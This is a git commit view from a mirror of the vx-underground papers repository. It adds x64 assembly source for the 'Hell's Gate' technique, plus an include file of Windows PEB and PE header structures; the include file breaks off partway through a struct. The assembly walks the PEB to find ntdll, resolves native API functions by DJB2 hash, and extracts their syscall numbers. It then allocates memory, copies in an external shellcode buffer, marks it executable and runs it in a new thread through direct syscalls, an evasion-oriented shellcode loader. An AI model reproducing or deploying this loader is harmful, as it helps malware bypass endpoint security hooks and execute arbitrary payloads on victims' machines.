mirror of
https://github.com/vxunderground/VXUG-Papers.git
synced 2024-06-16 11:58:10 +00:00
Add files via upload
This commit is contained in:
parent
ad3ed5a13f
commit
a6dbe47b59
262
Hells Gate/Assembly Expansion/HELLSGATE.ASM
Normal file
262
Hells Gate/Assembly Expansion/HELLSGATE.ASM
Normal file
@ -0,0 +1,262 @@
|
|||||||
|
; @file HELLSGATE.ASM
|
||||||
|
; @data 07-08-2020
|
||||||
|
; @author Paul Laîné (@am0nsec)
|
||||||
|
; @version 1.0
|
||||||
|
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||||
|
; @details
|
||||||
|
; @link https://ntamonsec.blogspot.com/
|
||||||
|
; @copyright This project has been released under the GNU Public License v3 license.
|
||||||
|
|
||||||
|
include HELLSGATE.INC
|
||||||
|
|
||||||
|
_DATA segment
|
||||||
|
extern Shellcode: BYTE
|
||||||
|
extern ShellcodeLength: QWORD
|
||||||
|
|
||||||
|
wSystemCall DWORD 000h
|
||||||
|
lpAddress QWORD ?
|
||||||
|
sDataSize QWORD ?
|
||||||
|
OldProtect QWORD ?
|
||||||
|
hThreadHandle QWORD ?
|
||||||
|
|
||||||
|
VXTable VX_TABLE <>
|
||||||
|
Timeout LARGE_INTEGER <>
|
||||||
|
_DATA ends
|
||||||
|
|
||||||
|
_TEXT segment
|
||||||
|
SystemCall PROC
|
||||||
|
mov r10, rcx
|
||||||
|
syscall
|
||||||
|
ret
|
||||||
|
SystemCall ENDP
|
||||||
|
|
||||||
|
HellsGate PROC
|
||||||
|
_start:
|
||||||
|
mov r8, gs:[60h] ; Get process environment block (PEB)
|
||||||
|
cmp [r8].PEB.OSMajorVersion, 0Ah ;
|
||||||
|
jne _failure ; Jump if not Windows 10
|
||||||
|
|
||||||
|
; Get the base address of ntdll
|
||||||
|
mov r8, [r8].PEB.Ldr ;
|
||||||
|
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
|
||||||
|
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
|
||||||
|
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
|
||||||
|
mov r9, r8 ; Store for later use
|
||||||
|
|
||||||
|
; Get module export directory
|
||||||
|
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
|
||||||
|
add r8, rbx ;
|
||||||
|
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
|
||||||
|
add r8, rbx ;
|
||||||
|
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
|
||||||
|
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
|
||||||
|
mov r8, r9 ; ImageBase
|
||||||
|
add r8, rbx ; Module + RVA
|
||||||
|
|
||||||
|
; Push function hashes
|
||||||
|
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
|
||||||
|
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
|
||||||
|
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
|
||||||
|
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
|
||||||
|
|
||||||
|
xor r15, r15 ; Clean R15 register
|
||||||
|
mov r15b, 4h ; Move to R15 number of functions to find
|
||||||
|
|
||||||
|
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
|
||||||
|
mov r12, r9 ; Function name RVA
|
||||||
|
add r12, rbx ; ImageBase + RVA
|
||||||
|
|
||||||
|
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
|
||||||
|
mov r13, r9 ;
|
||||||
|
add r13, rbx ;
|
||||||
|
|
||||||
|
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
|
||||||
|
mov r14, r9 ;
|
||||||
|
add r14, rbx ;
|
||||||
|
|
||||||
|
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
|
||||||
|
dec ecx
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; Find function ordinal index w/ function name hash
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_parse_functions_name:
|
||||||
|
mov rbx, 4h ; sizeof(DWORD)
|
||||||
|
imul rbx, rcx ; siezof(DWORD) * RCX
|
||||||
|
mov esi, [r12 + rbx] ; Function RVA
|
||||||
|
add rsi, r9 ; Function RVA + ImageBase
|
||||||
|
|
||||||
|
mov r10d, 5381h ; hash = 0x5381
|
||||||
|
_djb2:
|
||||||
|
mov r11d, r10d ; Store original hash value for later
|
||||||
|
shl r10d, 5 ; hash << 5
|
||||||
|
add r10d, r11d ; (hash << 5) + hash
|
||||||
|
|
||||||
|
xor r11d, r11d ; Clean temporary hash value
|
||||||
|
mov r11b, byte ptr [rsi] ; Get ASCII char
|
||||||
|
add r10d, r11d ; ((hash << 5) + hash) + char
|
||||||
|
|
||||||
|
inc rsi ; Next string char
|
||||||
|
cmp byte ptr [rsi], 00h ; End of string
|
||||||
|
jne _djb2 ;
|
||||||
|
|
||||||
|
lea rax, VXTable ; Address of VX table
|
||||||
|
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||||
|
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||||
|
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||||
|
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||||
|
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
|
||||||
|
jz _get_function_address ;
|
||||||
|
loop _parse_functions_name ;
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; Find the function address w/ function ordinal
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_get_function_address:
|
||||||
|
mov rax, 2h ; sizeof(WORD)
|
||||||
|
imul rax, rcx ; sizeof(WORD) * RCX
|
||||||
|
mov ax, [r14 + rax] ; AX = function ordinal
|
||||||
|
|
||||||
|
imul rax, 4 ; sizeof(DWORD) * ordinal
|
||||||
|
mov eax, [r13 + rax] ; RVA of function
|
||||||
|
mov rbx, r9 ; RBX = ImageBase
|
||||||
|
add rbx, rax ; RBX = address of function
|
||||||
|
|
||||||
|
lea rax, VXTable ; Address of VX table
|
||||||
|
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||||
|
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||||
|
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||||
|
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||||
|
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; Find the function system call w/ function address
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_get_function_syscall:
|
||||||
|
inc rbx
|
||||||
|
cmp byte ptr [rbx], 00C3h ; Check if RET
|
||||||
|
je _failure ;
|
||||||
|
|
||||||
|
cmp word ptr [rbx], 050Fh ; Check if syscall
|
||||||
|
jne _get_function_syscall ;
|
||||||
|
|
||||||
|
sub rbx, 0Eh ; Address of system call
|
||||||
|
mov cx, word ptr [rbx] ; CX = system call
|
||||||
|
|
||||||
|
lea rax, VXTable ; Address of VX table
|
||||||
|
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||||
|
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||||
|
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||||
|
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||||
|
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
|
||||||
|
|
||||||
|
_reset_loop:
|
||||||
|
; Move to the next function
|
||||||
|
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
|
||||||
|
dec ecx ;
|
||||||
|
dec r15 ; Check if all function have been found
|
||||||
|
jnz _parse_functions_name ;
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; Execute the payload
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_payload:
|
||||||
|
; Initialise variables
|
||||||
|
mov r10, ShellcodeLength ;
|
||||||
|
mov sDataSize, r10 ; Store shellcode length
|
||||||
|
mov lpAddress, 0h ;
|
||||||
|
|
||||||
|
; Execute NtAllocateVirtualMemory
|
||||||
|
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
|
||||||
|
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||||
|
lea rdx, lpAddress ; BaseAddress
|
||||||
|
xor r8, r8 ; ZeroBits
|
||||||
|
lea r9, sDataSize ; RegionSize
|
||||||
|
mov qword ptr [rsp + 20h], 3000h ; AllocationType
|
||||||
|
mov qword ptr [rsp + 28h], 4 ; Protect
|
||||||
|
|
||||||
|
call SystemCall ;
|
||||||
|
cmp eax, 00h ; (NTSTATUS != 0)
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
; Copy shellcode
|
||||||
|
cld ; Clear direction flag == forward copy
|
||||||
|
lea rsi, Shellcode ; Origin
|
||||||
|
mov rdi, lpAddress ; Destination
|
||||||
|
mov rcx, ShellcodeLength ; Size of shellcode
|
||||||
|
rep movsb ; Copy byte until RCX = 0
|
||||||
|
|
||||||
|
; Execute NtProtectVirtualMemory
|
||||||
|
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
|
||||||
|
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||||
|
lea rdx, lpAddress ; BaseAddress
|
||||||
|
lea r8, sDataSize ; NumberOfBytesToProtect
|
||||||
|
mov r9d, 20h ; NewAccessProtection
|
||||||
|
|
||||||
|
mov OldProtect, 00h ;
|
||||||
|
lea r11, OldProtect ;
|
||||||
|
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
|
||||||
|
|
||||||
|
call SystemCall ;
|
||||||
|
cmp eax, 00h ; (NTSTATUS != 0)
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
; Execute NtCreateThreadEx
|
||||||
|
mov ax, VXTable.NtCreateThreadEx.wSystemCall
|
||||||
|
mov hThreadHandle, 0 ;
|
||||||
|
lea rcx, hThreadHandle ; hThread
|
||||||
|
mov rdx, 1FFFFFh ; DesiredAccess
|
||||||
|
xor r8, r8 ; ObjectAttributes
|
||||||
|
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||||
|
mov r10, lpAddress ;
|
||||||
|
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
|
||||||
|
mov qword ptr [rsp + 28h], 00h ; lpParameter
|
||||||
|
mov qword ptr [rsp + 30h], 00h ; Flags
|
||||||
|
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
|
||||||
|
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
|
||||||
|
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
|
||||||
|
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
|
||||||
|
|
||||||
|
call SystemCall ;
|
||||||
|
cmp eax, 00h ; (NTSTATUS != 0)
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
; Execute NtWaitForSingleObject
|
||||||
|
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
|
||||||
|
mov rcx, hThreadHandle ; ObjectHandle
|
||||||
|
xor rdx, rdx ; Alertable
|
||||||
|
|
||||||
|
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
|
||||||
|
lea r8, Timeout ;
|
||||||
|
|
||||||
|
call SystemCall ;
|
||||||
|
cmp eax, 00h ; (NTSTATUS != 0)
|
||||||
|
jne _failure ;
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; Successfully execution of the function
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_success:
|
||||||
|
mov rax, 1
|
||||||
|
ret
|
||||||
|
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
; In case something goes wrong
|
||||||
|
;-----------------------------------------------------------------------------
|
||||||
|
_failure:
|
||||||
|
xor rax, rax
|
||||||
|
ret
|
||||||
|
HellsGate ENDP
|
||||||
|
_TEXT ends
|
||||||
|
|
||||||
|
; end of file
|
||||||
|
end
|
285
Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
285
Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
@ -0,0 +1,285 @@
|
|||||||
|
; @file HELLSGATE.INC
|
||||||
|
; @data 07-08-2020
|
||||||
|
; @author Paul Laîné (@am0nsec)
|
||||||
|
; @version 1.0
|
||||||
|
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||||
|
; @details
|
||||||
|
; @link https://ntamonsec.blogspot.com/
|
||||||
|
; @copyright This project has been released under the GNU Public License v3 license.
|
||||||
|
|
||||||
|
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
|
||||||
|
VXTableSize EQU SIZEOF VX_TABLE
|
||||||
|
|
||||||
|
VX_TABLE_ENTRY struct
|
||||||
|
pAddress QWORD ? ; 0x0000
|
||||||
|
dwHash DWORD ? ; 0x0008
|
||||||
|
wSystemCall WORD ? ; 0x000C
|
||||||
|
BYTE 2 dup(?) ; padding
|
||||||
|
VX_TABLE_ENTRY ends
|
||||||
|
|
||||||
|
VX_TABLE struct
|
||||||
|
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
|
||||||
|
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
|
||||||
|
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
|
||||||
|
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
|
||||||
|
VX_TABLE ends
|
||||||
|
|
||||||
|
LARGE_INTEGER struct
|
||||||
|
LowPart DWORD ? ; 0x0000
|
||||||
|
HighPart DWORD ? ; 0x0004
|
||||||
|
LARGE_INTEGER ends
|
||||||
|
|
||||||
|
ULARGE_INTEGER struct
|
||||||
|
LowPart DWORD ? ; 0x0000
|
||||||
|
HighPart DWORD ? ; 0x0004
|
||||||
|
ULARGE_INTEGER ends
|
||||||
|
|
||||||
|
UNICODE_STRING struct
|
||||||
|
_Length WORD ? ; 0x0000
|
||||||
|
MaximumLength WORD ? ; 0x0002
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
Buffer QWORD ? ; 0x0008
|
||||||
|
UNICODE_STRING ends
|
||||||
|
|
||||||
|
LIST_ENTRY struct
|
||||||
|
Flink QWORD ? ; 0x0000
|
||||||
|
BLink QWORD ? ; 0x0008
|
||||||
|
LIST_ENTRY ends
|
||||||
|
|
||||||
|
PEB struct
|
||||||
|
InheritedAddressSpace BYTE ? ; 0x0000
|
||||||
|
ReadImageFileExecOptions BYTE ? ; 0x0001
|
||||||
|
BeingDebugged BYTE ? ; 0x0002
|
||||||
|
BitField BYTE ? ; 0x0003
|
||||||
|
Padding0 BYTE 4 dup(?) ; 0x0004
|
||||||
|
Mutant QWORD ? ; 0x0008
|
||||||
|
ImageBaseAddress QWORD ? ; 0x0010
|
||||||
|
Ldr QWORD ? ; 0x0018
|
||||||
|
ProcessParameters QWORD ? ; 0x0020
|
||||||
|
SubSystemData QWORD ? ; 0x0028
|
||||||
|
ProcessHeap QWORD ? ; 0x0030
|
||||||
|
FastPebLock QWORD ? ; 0x0038
|
||||||
|
AtlThunkSListPtr QWORD ? ; 0x0040
|
||||||
|
IFEOKey QWORD ? ; 0x0048
|
||||||
|
CrossProcessFlags DWORD ? ; 0x0050
|
||||||
|
Padding1 BYTE 4 dup(?) ; 0x0054
|
||||||
|
UserSharedInfoPtr QWORD ? ; 0x0058
|
||||||
|
SystemReserved DWORD ? ; 0x0060
|
||||||
|
AtlThunkSListPtr32 DWORD ? ; 0x0064
|
||||||
|
ApiSetMap QWORD ? ; 0x0068
|
||||||
|
TlsExpansionCounter DWORD ? ; 0x0070
|
||||||
|
Padding2 BYTE 4 dup(?) ; 0x0074
|
||||||
|
TlsBitmap QWORD ? ; 0x0078
|
||||||
|
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
|
||||||
|
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
|
||||||
|
SharedData QWORD ? ; 0x0090
|
||||||
|
ReadOnlyStaticServerData QWORD ? ; 0x0098
|
||||||
|
AnsiCodePageData QWORD ? ; 0x00A0
|
||||||
|
OemCodePageData QWORD ? ; 0x00A8
|
||||||
|
UnicodeCaseTableData QWORD ? ; 0x00B0
|
||||||
|
NumberOfProcessors DWORD ? ; 0x00B9
|
||||||
|
NtGlobalFlag DWORD ? ; 0x00BC
|
||||||
|
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
|
||||||
|
HeapSegmentReserve QWORD ? ; 0x00C8
|
||||||
|
HeapSegmentCommit QWORD ? ; 0x00D0
|
||||||
|
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
|
||||||
|
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
|
||||||
|
NumberOfHeaps DWORD ? ; 0x00E8
|
||||||
|
MaximumNumberOfHeaps DWORD ? ; 0x00EC
|
||||||
|
ProcessHeaps QWORD ? ; 0x00F0
|
||||||
|
GdiSharedHandleTable QWORD ? ; 0x00F8
|
||||||
|
ProcessStarterHelper QWORD ? ; 0x0100
|
||||||
|
GdiDCAttributeList DWORD ? ; 0x0108
|
||||||
|
Padding3 BYTE 4 dup(?) ; 0x010C
|
||||||
|
LoaderLock QWORD ? ; 0x0110
|
||||||
|
OSMajorVersion DWORD ? ; 0x0118
|
||||||
|
OSMinorVersion DWORD ? ; 0x011C
|
||||||
|
OSBuildNumber WORD ? ; 0x0120
|
||||||
|
OSCSDVersion WORD ? ; 0x0122
|
||||||
|
OSPlatformId DWORD ? ; 0x0124
|
||||||
|
ImageSubsystem DWORD ? ; 0x0128
|
||||||
|
ImageSubsystemMajorVersion DWORD ? ; 0x012C
|
||||||
|
ImageSubsystemMinorVersion DWORD ? ; 0x0130
|
||||||
|
Padding4 BYTE 4 dup(?) ; 0x0134
|
||||||
|
ActiveProcessAffinityMask QWORD ? ; 0x0138
|
||||||
|
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
|
||||||
|
PostProcessInitRoutine QWORD ? ; 0x0230
|
||||||
|
TlsExpansionBitmap QWORD ? ; 0x0238
|
||||||
|
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
|
||||||
|
SessionId DWORD ? ; 0x02C0
|
||||||
|
Padding5 BYTE 4 dup(?) ; 0x02C4
|
||||||
|
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
|
||||||
|
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
|
||||||
|
pShimData QWORD ? ; 0x02D8
|
||||||
|
AppCompatInfo QWORD ? ; 0x02E0
|
||||||
|
CSDVersion UNICODE_STRING <> ; 0x02E8
|
||||||
|
ActivationContextData QWORD ? ; 0x02F8
|
||||||
|
ProcessAssemblyStorageMap QWORD ? ; 0x0300
|
||||||
|
SystemDefaultActivationContextData QWORD ? ; 0x0308
|
||||||
|
SystemAssemblyStorageMap QWORD ? ; 0x0310
|
||||||
|
MinimumStackCommit QWORD ? ; 0x0318
|
||||||
|
SparePointers QWORD 4 dup(?) ; 0x0320
|
||||||
|
SpareUlongs DWORD 5 dup(?) ; 0x0340
|
||||||
|
BYTE 4 dup(?)
|
||||||
|
WerRegistrationData QWORD ? ; 0x0358
|
||||||
|
WerShipAssertPtr QWORD ? ; 0x0360
|
||||||
|
pUnused QWORD ? ; 0x0368
|
||||||
|
pImageHeaderHash QWORD ? ; 0x0370
|
||||||
|
TracingFlags DWORD ? ; 0x0378
|
||||||
|
Padding6 BYTE 4 dup(?) ; 0x037c
|
||||||
|
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
|
||||||
|
TppWorkerpListLock QWORD ? ; 0x0388
|
||||||
|
TppWorkerpList LIST_ENTRY <> ; 0x0390
|
||||||
|
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
|
||||||
|
TelemetryCoverageHeader QWORD ? ; 0x07A0
|
||||||
|
CloudFileFlags DWORD ? ; 0x07A8
|
||||||
|
CloudFileDiagFlags DWORD ? ; 0x07AC
|
||||||
|
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
|
||||||
|
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
|
||||||
|
LeapSecondData QWORD ? ; 0x07B8
|
||||||
|
LeapSecondFlags DWORD ? ; 0x07c0
|
||||||
|
NtGlobalFlag2 DWORD ? ; 0x07c4
|
||||||
|
PEB ends
|
||||||
|
|
||||||
|
PEB_LDR_DATA struct
|
||||||
|
_Length DWORD ? ; 0x0000
|
||||||
|
Initialized BYTE ? ; 0x0004
|
||||||
|
BYTE 3 dup(?) ; padding
|
||||||
|
SsHandle QWORD ? ; 0x0008
|
||||||
|
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
|
||||||
|
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
|
||||||
|
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
|
||||||
|
EntryInProgress QWORD ? ; 0x0040
|
||||||
|
ShutdownInProgress BYTE ? ; 0x0048
|
||||||
|
BYTE 7 dup(?) ; padding
|
||||||
|
ShutdownThreadId QWORD ? ; 0x0050
|
||||||
|
PEB_LDR_DATA ends
|
||||||
|
|
||||||
|
RTL_BALANCED_NODE struct
|
||||||
|
_Dummy BYTE 24 dup(?)
|
||||||
|
RTL_BALANCED_NODE ends
|
||||||
|
|
||||||
|
LDR_DATA_TABLE_ENTRY struct
|
||||||
|
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
|
||||||
|
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
|
||||||
|
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
|
||||||
|
DllBase QWORD ? ; 0x0030
|
||||||
|
EntryPoint QWORD ? ; 0x0038
|
||||||
|
SizeOfImage DWORD ? ; 0x0040
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
FullDllName UNICODE_STRING <> ; 0x0048
|
||||||
|
BaseDllName UNICODE_STRING <> ; 0x0058
|
||||||
|
FlagGroup BYTE 4 dup(?) ; 0x0068
|
||||||
|
ObsoleteLoadCount WORD ? ; 0x006C
|
||||||
|
TlsIndex WORD ? ; 0x006E
|
||||||
|
HashLinks LIST_ENTRY <> ; 0x0070
|
||||||
|
TimeDateStamp DWORD ? ; 0x0080
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
EntryPointActivationContext QWORD ? ; 0x0088
|
||||||
|
_Lock QWORD ? ; 0x0090
|
||||||
|
DdagNode QWORD ? ; 0x0098
|
||||||
|
NodeModuleLink LIST_ENTRY <> ; 0x00A0
|
||||||
|
LoadContext QWORD ? ; 0x00B0
|
||||||
|
ParentDllBase QWORD ? ; 0x00B8
|
||||||
|
SwitchBackContext QWORD ? ; 0x00C0
|
||||||
|
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
|
||||||
|
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
|
||||||
|
OriginalBase QWORD ? ; 0x00F8
|
||||||
|
LoadTime LARGE_INTEGER <> ; 0x0100
|
||||||
|
BaseNameHashValue DWORD ? ; 0x0108
|
||||||
|
LoadReason DWORD ? ; 0x010C
|
||||||
|
ImplicitPathOptions DWORD ? ; 0x0110
|
||||||
|
ReferenceCount DWORD ? ; 0x0114
|
||||||
|
DependentLoadFlags DWORD ? ; 0x0118
|
||||||
|
SigningLevel BYTE ? ; 0x011C
|
||||||
|
LDR_DATA_TABLE_ENTRY ends
|
||||||
|
|
||||||
|
IMAGE_DOS_HEADER struct
|
||||||
|
e_magic WORD ? ; 0x0000
|
||||||
|
e_cblp WORD ? ; 0x0002
|
||||||
|
e_cp WORD ? ; 0x0004
|
||||||
|
e_crlc WORD ? ; 0x0006
|
||||||
|
e_cparhdr WORD ? ; 0x0008
|
||||||
|
e_minalloc WORD ? ; 0x000A
|
||||||
|
e_maxalloc WORD ? ; 0x000C
|
||||||
|
e_ss WORD ? ; 0x000E
|
||||||
|
e_sp WORD ? ; 0x0010
|
||||||
|
e_csum WORD ? ; 0x0012
|
||||||
|
e_ip WORD ? ; 0x0014
|
||||||
|
e_cs WORD ? ; 0x0016
|
||||||
|
e_lfarlc WORD ? ; 0x0018
|
||||||
|
e_ovno WORD ? ; 0x001A
|
||||||
|
e_res WORD 4 dup(?) ; 0x001C
|
||||||
|
e_oemid WORD ? ; 0x0024
|
||||||
|
e_oeminfo WORD ? ; 0x0026
|
||||||
|
e_res2 WORD 10 dup(?) ; 0x0028
|
||||||
|
e_lfanew DWORD ? ; 0x003C
|
||||||
|
IMAGE_DOS_HEADER ends
|
||||||
|
|
||||||
|
IMAGE_FILE_HEADER struct
|
||||||
|
Machine WORD ? ; 0x0000
|
||||||
|
NumberOfSections WORD ? ; 0x0002
|
||||||
|
TimeDateStamp DWORD ? ; 0x0004
|
||||||
|
PointerToSymbolTable DWORD ? ; 0x0008
|
||||||
|
NumberOfSymbols DWORD ? ; 0x000c
|
||||||
|
SizeOfOptionalHeader WORD ? ; 0x0010
|
||||||
|
Characteristics WORD ? ; 0x0012
|
||||||
|
IMAGE_FILE_HEADER ends
|
||||||
|
|
||||||
|
IMAGE_DATA_DIRECTORY struct
|
||||||
|
VirtualAddress DWORD ? ; 0x0000
|
||||||
|
_Size DWORD ? ; 0x0004
|
||||||
|
IMAGE_DATA_DIRECTORY ends
|
||||||
|
|
||||||
|
IMAGE_OPTIONAL_HEADER64 struct
|
||||||
|
Magic WORD ? ; 0x0000
|
||||||
|
MajorLinkerVersion BYTE ? ; 0x0002
|
||||||
|
MinorLinkerVersion BYTE ? ; 0x0003
|
||||||
|
SizeOfCode DWORD ? ; 0x0004
|
||||||
|
SizeOfInitializedData DWORD ? ; 0x0008
|
||||||
|
SizeOfUninitializedData DWORD ? ; 0x000C
|
||||||
|
AddressOfEntryPoint DWORD ? ; 0x0010
|
||||||
|
BaseOfCode DWORD ? ; 0x0014
|
||||||
|
ImageBase QWORD ? ; 0x0018
|
||||||
|
SectionAlignment DWORD ? ; 0x0020
|
||||||
|
FileAlignment DWORD ? ; 0x0024
|
||||||
|
MajorOperatingSystemVersion WORD ? ; 0x0028
|
||||||
|
MinorOperatingSystemVersion WORD ? ; 0x002a
|
||||||
|
MajorImageVersion WORD ? ; 0x002C
|
||||||
|
MinorImageVersion WORD ? ; 0x002E
|
||||||
|
MajorSubsystemVersion WORD ? ; 0x0030
|
||||||
|
MinorSubsystemVersion WORD ? ; 0x0032
|
||||||
|
Win32VersionValue DWORD ? ; 0x0034
|
||||||
|
SizeOfImage DWORD ? ; 0x0038
|
||||||
|
SizeOfHeaders DWORD ? ; 0x003c
|
||||||
|
CheckSum DWORD ? ; 0x0040
|
||||||
|
Subsystem WORD ? ; 0x0044
|
||||||
|
DllCharacteristics WORD ? ; 0x0046
|
||||||
|
SizeOfStackReserve QWORD ? ; 0x0048
|
||||||
|
SizeOfStackCommit QWORD ? ; 0x0050
|
||||||
|
SizeOfHeapReserve QWORD ? ; 0x0058
|
||||||
|
SizeOfHeapCommit QWORD ? ; 0x0060
|
||||||
|
LoaderFlags DWORD ? ; 0x0068
|
||||||
|
NumberOfRvaAndSizes DWORD ? ; 0x006C
|
||||||
|
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
|
||||||
|
IMAGE_OPTIONAL_HEADER64 ends
|
||||||
|
|
||||||
|
IMAGE_NT_HEADERS64 struct
|
||||||
|
Signature DWORD ? ; 0x0000
|
||||||
|
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
|
||||||
|
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
|
||||||
|
IMAGE_NT_HEADERS64 ends
|
||||||
|
|
||||||
|
IMAGE_EXPORT_DIRECTORY struct
|
||||||
|
Characteristics DWORD ? ; 0x0000
|
||||||
|
TimeDateStamp DWORD ? ; 0x0004
|
||||||
|
MajorVersion WORD ? ; 0x0008
|
||||||
|
MinorVersion WORD ? ; 0x000A
|
||||||
|
_Name DWORD ? ; 0x000C
|
||||||
|
Base DWORD ? ; 0x0010
|
||||||
|
NumberOfFunctions DWORD ? ; 0x0014
|
||||||
|
NumberOfNames DWORD ? ; 0x0018
|
||||||
|
AddressOfFunctions DWORD ? ; 0x001C
|
||||||
